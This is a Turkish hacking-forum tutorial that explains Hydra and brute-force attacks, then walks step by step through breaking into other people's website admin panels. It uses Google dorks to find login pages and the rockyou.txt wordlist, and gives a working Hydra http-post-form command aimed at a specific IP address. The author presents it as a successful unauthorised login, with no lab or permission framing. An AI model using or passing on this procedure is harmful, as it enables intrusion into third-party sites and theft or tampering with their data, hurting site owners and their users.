Selamlar TurkHackTeam Aile'si
Bugun Sizlerler Hem Ilk Konumu Hemde
Bildiklerimi Sizlere Ogretecegim..
Hadi Gecelim Ozaman.
Hydra Nedir ?
Şifreleri kırmak için kullanılan bir kaba kuvvet aracıdır; bu, esas olarak, giriş bilgilerini tahmin etmek için bir şifre barajı göndermek için yazılımı kullandığı anlamına gelir. Çoğu insan, çevrimiçi varlığınızdan oldukça kolay tahmin edilebilecek aşırı basit parolalara sahiptir; örneğin sevdiklerinin adı, doğum günü, favori spor takımı vb. Bu, yeterli sosyal mühendislik ve sınırsız sayıda tahmin ile doğru şifreyi bulma olasılığının yüksek olduğu anlamına gelir.
Hydra yazılımı, doğru olanı bulana kadar oluşturulan bir listedeki her bir şifreyi sistematik olarak gözden geçirerek bunu otomatik bir süreç haline getirir.
Admin Panel Nedir ?
Admin panelleri genelde siteyi yönetmek için kullanılan alandır. Orada webmaster ve editörlerin hizmet verdiği, içerik eklediği, görsel sunum ve video eklediği alandır. Bu alan her Web Sitesi sahibine özel bir yerdir.
Brute Force Nedir ?
“Brute Force nedir?” sorusunu; bir anahtarlığa takılı olan tüm anahtarları deneyerek doğru olanı bulmaya ve kapıyı açmaya çalışan bir hırsız metaforuyla yanıtlayabiliriz.
Diğer birçok siber saldırı taktiğinden farklı olarak, Brute Force (kaba kuvvet) saldırıları; web sitelerindeki güvenlik açıklarını değil zayıf veya tahmin edilebilir kullanıcı adı ve şifrelerini hedefler.
Brute Force saldırıları; farklı kullanıcı adı ve şifre kombinasyonlarını kullanarak bir tanesinin geçerli olacağı ümidiyle, şifreleri kırmaya çalışır. Amaç; bir yönetici hesabı ya da parola korumalı sayfa gibi kısıtlanmış bir kaynağa erişim sağlamaktır. Saldırgan; bilgileri çalmak ya da sitelere kötü amaçlı yazılım bulaştırmak isteyebilir.
Basit bir saldırı yöntemi olan Brute Force’un başarı oranı yüksektir.
Kucuk Temel Bilgilerimizi Aldik Hadi Ozaman Admin Panelerimize Brute Force Deneyelim.
Ilk Once Gereken Seyler Admin Panel Dorklaridir.
Google Admin Panel Dork Yaziyoruz.
Gordugunuz Gibi Onumuze Boyle Bir Site Cikdi.
Linkimize Tikliyoruz.
Gordugunuz gibi onumuze dork listeleri cikti.
Bunlardan birisini seciyoruz.
Gordugunuz gibi onumuze Siteler cikdi.
basliklar Admin Login Olarak Geldi.
Simdi Gordugunuz Gibi Sitenin Admin Paneli Acildi.
Simdi Gecelim Sitenin IP Adresini bulmaya. ama bundan ilk once bize bir
wordlist gerekli sifreler icin.
bunun icinde Githubda Olan rockyou.txt
wordlistini kulanacagiz.
Googleye Rockyou.txt github yaziyoruz ve onumuze gelen dosyani Kali Linux
Sanal Makinemize kuruyoruz
Gordugunuz Gibi Karsimiza Cikti
Tiklayarak Indiriyoruz.
Simdi Hersey Tamam Ancak Sitemizin IP Adresini Bulmamiz Lazim.
Oyuzden Kali Linux Aracimizda PING Komutunu kulanicaz.
Simdi Sitemizin URL kismini Kopyaliyoruz.
ping sitemizinurl.com
boyle yaziyoruz ve enter diyoruz.
ve onumuze gordugunuz gibi ip adresleri geliyor
gordugunuz gibi kodlarimizi yazdik ortada yazdigim kisima ise.
sitenin ip adresini yaziyoruz.
Kodlar :
Kod:
hydra -l admin -P '/home/kali/Desktop/rockyou.txt' 43.255.154.57 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Gordugunuz gibi sitenin Admin Panel Sifreleri BruteForce Sayesinde
Onumuze Geldi
Gordugunuz gibi user ve password
yazarak giris yapiyoruz.
Gordugunuz gibi sitemize girdik
buraya kadar okudugunuz icin tessekurler
iyi forumlar dilerim..
Son düzenleme: